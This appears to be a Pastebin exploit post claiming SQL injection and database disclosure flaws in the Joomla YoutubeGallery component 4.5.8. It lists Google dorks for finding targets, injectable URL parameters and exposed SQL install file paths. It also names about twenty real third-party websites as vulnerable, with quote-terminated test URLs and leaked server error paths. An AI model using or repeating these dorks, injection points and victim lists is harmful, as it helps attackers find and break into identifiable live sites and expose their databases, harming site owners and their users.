API tools faq
paste
Advertisement
KingSkrupellos

Joomla YoutubeGallery 4.5.8 Database Disclosure and SQL Inj

KingSkrupellos
Jan 17th, 2019
227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.30 KB | None | 0 0
raw download clone embed print report
  1. ########################################################################################
  2.  
  3. # Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/01/2019
  7. # Vendor Homepage : joomlaboat.com
  8. # Software Information Links : extensions.joomla.org/extension/youtube-gallery/
  9. joomlaboat.com/en/youtube-gallery
  10. # Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
  11. # Software Vulnerable Source Codes :
  12. github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
  13. github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
  14. # Software Affected Versions : 4.5.8 and previous versions
  15. # Tested On : Windows and Linux
  16. # Category : WebApps
  17. # Exploit Risk : Medium
  18. # Google Dorks : inurl:''/index.php?option=com_youtubegallery''
  19. inurl:''/administrator/components/com_youtubegallery/''
  20. # Previous Version : 4.1.7 CVE Details =>
  21. nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
  22. # CVE : CVE-2014-4960
  23. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  24. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  25. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  26. CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  27.  
  28. ########################################################################################
  29.  
  30. # SQL Injection Exploit :
  31. **********************
  32.  
  33. /index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection]
  34.  
  35. /index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]
  36.  
  37. /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection]
  38.  
  39. /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
  40. [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]
  41.  
  42. /index.php?option=com_youtubegallery&view=gallery&Itemid=
  43. [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]
  44.  
  45. /index.php?option=com_youtubegallery&view=youtubegallery&galleryid=
  46. [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]
  47.  
  48. /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
  49. [ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]
  50.  
  51. /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=
  52. [ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]
  53.  
  54. /index.php?option=com_youtubegallery&view=youtubegallery&listid=
  55. [ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=
  56. [YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=
  57. true&height=[ID-NUMBER]&width=[SQL Injection]
  58.  
  59. ########################################################################################
  60.  
  61. # Database Disclosure Exploit :
  62. ***************************
  63.  
  64. /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
  65. /administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
  66. /administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
  67. /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
  68. /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
  69. /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
  70. /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
  71. /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
  72. /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
  73. /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
  74. /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
  75. /administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
  76. /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
  77. /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
  78. /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
  79. /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
  80. /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
  81. /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
  82. /administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
  83. /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
  84. /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
  85. /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
  86. /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
  87. /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
  88. /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
  89. /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
  90. /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
  91. /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
  92. /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
  93. /administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
  94. /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
  95. /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql
  96.  
  97. ########################################################################################
  98.  
  99. # Example Vulnerable Sites :
  100. *************************
  101.  
  102. [+] terrabit.com.br/cmfp/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
  103.  
  104. [+] jfkleinheidorn.de/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
  105.  
  106. [+] ceensac.com/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=266%27 =>
  107.  
  108. [ Proof of Concept for SQL Injection ] => archive.is/VXqiB
  109.  
  110. [+] newyddwelshcobs.co.uk/index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27
  111.  
  112. [+] medealabperu.com/senscience/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=82X2hj53r2I&tmpl=1%27
  113.  
  114. [+] praiamotor.com.br/index.php?option=com_youtubegallery&view=gallery&Itemid=37%27
  115.  
  116. [+] ncd.org.jo/index.php?option=com_youtubegallery&view=gallery&Itemid=128%27
  117.  
  118. [+] nazarethchurchnotethnic.org/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=216&galleryid=1&videoid=1%27
  119.  
  120. [+] aakashgupta.com/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=113%27
  121.  
  122. [+] mindthekids.com.co/index.php?option=com_youtubegallery&view=gallery&Itemid=95&videoid=1%27
  123.  
  124. [+] ourtransition.info/index.php?option=com_youtubegallery&view=gallery&Itemid=6%27
  125.  
  126. [+] ventzimartinov.com/index.php?option=com_youtubegallery&view=gallery&Itemid=56&videoid=u-OtHblFgkc&lang=1%27
  127.  
  128. [+] ponowa48.pl/index.php?option=com_youtubegallery&view=gallery&Itemid=114%27
  129.  
  130. [+] srisaidarshan.org/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=22%27
  131.  
  132. [+] carpmachine.at/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=140'
  133.  
  134. [+] ondazul.org.br/site/index.php?option=com_youtubegallery&view=gallery&Itemid=73'
  135.  
  136. [+] hitech-stroy.ck.ua/index.php?option=com_youtubegallery&view=gallery&Itemid=4'
  137.  
  138. [+] hundesport-gersdorf.de/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=158&videoid=P833hFQoB4A=1%27
  139.  
  140. [+] jamesallenclark.com/index.php?option=com_youtubegallery&view=gallery&Itemid=57'
  141.  
  142. ########################################################################################
  143.  
  144. # Example SQL Database Error :
  145.  
  146. Strict Standards: Only variables should be assigned by reference in
  147. /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51
  148.  
  149. Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be
  150. called statically, assuming $this from incompatible context in /home/medealab
  151. /public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198
  152.  
  153. Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo)
  154. [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410
  155. Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components
  156. /com_youtubegallery/models/gallery.php on line 145
  157.  
  158. ########################################################################################
  159.  
  160. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  161.  
  162. ########################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!